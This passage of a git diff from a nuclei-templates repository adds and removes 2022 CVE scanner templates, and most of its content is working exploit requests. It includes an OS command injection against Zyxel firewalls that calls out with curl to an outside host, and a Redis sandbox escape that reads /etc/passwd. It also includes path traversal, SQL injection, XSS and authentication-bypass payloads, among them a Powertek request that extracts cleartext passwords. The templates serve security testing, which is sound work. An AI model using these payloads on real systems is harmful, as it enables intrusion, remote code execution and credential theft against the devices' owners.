6.1 + cve-id: CVE-2022-30489 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: xss,cve2022,wavlink,cve,router,iot +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'parent.location.replace("http://")' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml deleted file mode 100644 index f1fe6f3456..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-30525 -info: - name: Zyxel Firewall - OS Command Injection - author: h1ei1,prajiteshsingh - severity: critical - description: | - An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. - reference: - - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - - https://github.com/rapid7/metasploit-framework/pull/16563 - - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml - - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-30525 - cwe-id: CWE-78 - metadata: - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: rce,zyxel,cve,cve2022,firewall,unauth,kev -requests: - - raw: - - | - POST /ztp/cgi-bin/handler HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml deleted file mode 100644 index 2c50f208fc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-30777 -info: - name: Parallels H-Sphere - Cross Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - - https://en.wikipedia.org/wiki/H-Sphere - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - metadata: - shodan-query: title:"h-sphere" - verified: "true" - tags: cve,cve2022,parallels,hsphere,xss -requests: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '"><script>alert(document.domain)</script>' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml new file mode 100644 index 0000000000..c09b86777f --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-31373 +info: + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31373 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,xss,solarview +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32007.yaml b/nuclei-templates/CVE-2022/CVE-2022-32007.yaml new file mode 100644 index 0000000000..cc29bbd8fc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32007.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-32007 +info: + name: Complete Online Job Search System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32007 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,eris,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_email={{username}}&user_pass={{password}}&btnLogin= + - | + GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml new file mode 100644 index 0000000000..1fa8cbf9bc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-32018 +info: + name: Complete Online Job Search System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32018 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli +variables: + num: "999999999" +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml new file mode 100644 index 0000000000..644f0f8df2 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-32024 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32024 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml deleted file mode 100644 index fb24e14552..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-32025 -info: - name: Car Rental Management System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32025 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}%23&password={{password}} - - | - GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - skip-variables-check: true - redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml new file mode 100644 index 0000000000..6afb4dca59 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-32028 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-32159.yaml b/nuclei-templates/CVE-2022/CVE-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-32159.yaml rename to nuclei-templates/CVE-2022/CVE-2022-32159.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml new file mode 100644 index 0000000000..aec3372d91 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-32409 +info: + name: i3geo - Directory Traversal + author: pikpikcu + severity: critical + description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-94 + metadata: + shodan-query: http.html:"i3geo" + verified: "true" + tags: cve,cve2022,i3geo,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml b/nuclei-templates/CVE-2022/CVE-2022-32444.yaml deleted file mode 100644 index 1460ae469c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2022-32444 - -info: - name: u5cms v8.3.5 - Open Redirect - author: 0x_Akoko - severity: medium - description: | - u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. - reference: - - https://github.com/u5cms/u5cms/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-32444 - cwe-id: CWE-601 - tags: cve,cve2022,redirect,u5cms,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/loginsave.php?u=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33174.yaml b/nuclei-templates/CVE-2022/CVE-2022-33174.yaml new file mode 100644 index 0000000000..26dd8298df --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-33174.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-33174 +info: + name: Powertek Firmware - Authorization Bypass + author: pikpikcu + severity: high + description: | + Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + reference: + - https://gynvael.coldwind.pl/?lang=en&id=748 + - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-33174 + cwe-id: CWE-863 + metadata: + shodan-query: http.html:"Powertek" + verified: "true" + tags: cve,cve2022,powertek,auth-bypass +requests: + - raw: + - | + GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 + Host: {{Hostname}} + Cookie: tmpToken=; + matchers-condition: and + matchers: + - type: word + words: + - '<sys.passwd>' + - '<sys.su.name>' + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' + - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' diff --git a/nuclei-templates/CVE-2022/CVE-2022-34049.yaml b/nuclei-templates/CVE-2022/CVE-2022-34049.yaml deleted file mode 100644 index 6a78378e04..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34049.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-34049 -info: - name: Wavlink Exportlogs.sh - Configuration Exposure - author: For3stCo1d - severity: medium - description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. - reference: - - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 - - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing - - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-34049 - cwe-id: CWE-552 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,wavlink,router,exposure -requests: - - raw: - - | - GET /cgi-bin/ExportLogs.sh HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Login' - - 'Password' - condition: and - - type: word - part: header - words: - - filename="sysLogs.txt" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml new file mode 100644 index 0000000000..d782414f0d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-35416 +info: + name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + metadata: + shodan-query: http.html_hash:510586239 + verified: "true" + tags: cve,cve2022,xss,vpn,h3c +requests: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang=<script>alert('document.domain')</script> + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>alert('document.domain')</script>" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-40684.yaml b/nuclei-templates/CVE-2022/CVE-2022-40684.yaml deleted file mode 100644 index f2ede7984e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-40684.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2022-40684 - -info: - name: FortiOS Authentication Bypass - author: Shockwave - severity: Critical - description: An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests. - reference: - - https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ - - tags: authentication bypass - -requests: - - raw: - - | - PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}} - User-Agent: Report Runner - Content-Type: application/json - Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; - Content-Length: 610 - { - "ssh-public-key1": "fake-key" - } - matchers: - - type: word - words: - - 'Invalid SSH public key.\' diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml new file mode 100644 index 0000000000..9c67da252a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0165.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-0165 + +info: + name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect + author: akincibor + severity: high + description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + reference: + - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2022-0165 + cwe-id: CWE-601 + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml deleted file mode 100644 index b69da0b65f..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0201.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-0201 - -info: - name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting - author: Akincibor - severity: medium - description: | - WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. - reference: - - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - - https://plugins.trac.wordpress.org/changeset/2656512 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0201 - cwe-id: CWE-79 - tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<img src onerror=alert(/XSS/)>' - - 'pm_query' - condition: and - - - type: word - part: header - words: - - text/html - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0288.yaml b/nuclei-templates/CVE-2022/cve-2022-0288.yaml deleted file mode 100644 index 16085e702d..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0288.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0288 - -info: - name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. - reference: - - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - remediation: Fixed in version 2.7.12 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0288 - cwe-id: CWE-79 - tags: wordpress,xss,wpscan,cve,cve2022 - -requests: - - method: POST - path: - - "{{BaseURL}}" - - headers: - Content-Type: "application/x-www-form-urlencoded" - - body: | - html_element_selection=</script><img+src+onerror=alert(document.domain)> - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "</script><img src onerror=alert(document.domain)>" - - "ad-inserter" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0381.yaml b/nuclei-templates/CVE-2022/cve-2022-0381.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0381.yaml rename to nuclei-templates/CVE-2022/cve-2022-0381.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0543.yaml b/nuclei-templates/CVE-2022/cve-2022-0543.yaml new file mode 100644 index 0000000000..d26e91ee2f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0543.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0543 + +info: + name: Redis Sandbox Escape - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. + reference: + - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce + - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis + - https://bugs.debian.org/1005787 + - https://www.debian.org/security/2022/dsa-5081 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-0543 + metadata: + shodan-query: redis_version + tags: cve,cve2022,network,redis,unauth,rce,kev + +network: + - inputs: + - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 64 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0595.yaml b/nuclei-templates/CVE-2022/cve-2022-0595.yaml new file mode 100644 index 0000000000..85f16ad2ee --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0595.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-0595 + +info: + name: WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting + author: akincibor + severity: medium + description: | + WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action. + reference: + - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de + - https://plugins.trac.wordpress.org/changeset/2686614 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0595 + cwe-id: CWE-79 + tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 + + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="size_limit" + + 10485760 + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="action" + + dnd_codedropz_upload + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="type" + + click + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg" + Content-Type: image/jpeg + + <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> + -----------------------------92633278134516118923780781161-- + + - | + GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "alert(document.domain)")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0599.yaml b/nuclei-templates/CVE-2022/cve-2022-0599.yaml deleted file mode 100644 index b1a73d1aa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0599.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-0599 - -info: - name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting - author: scent2d - severity: medium - description: | - WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. - reference: - - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - - 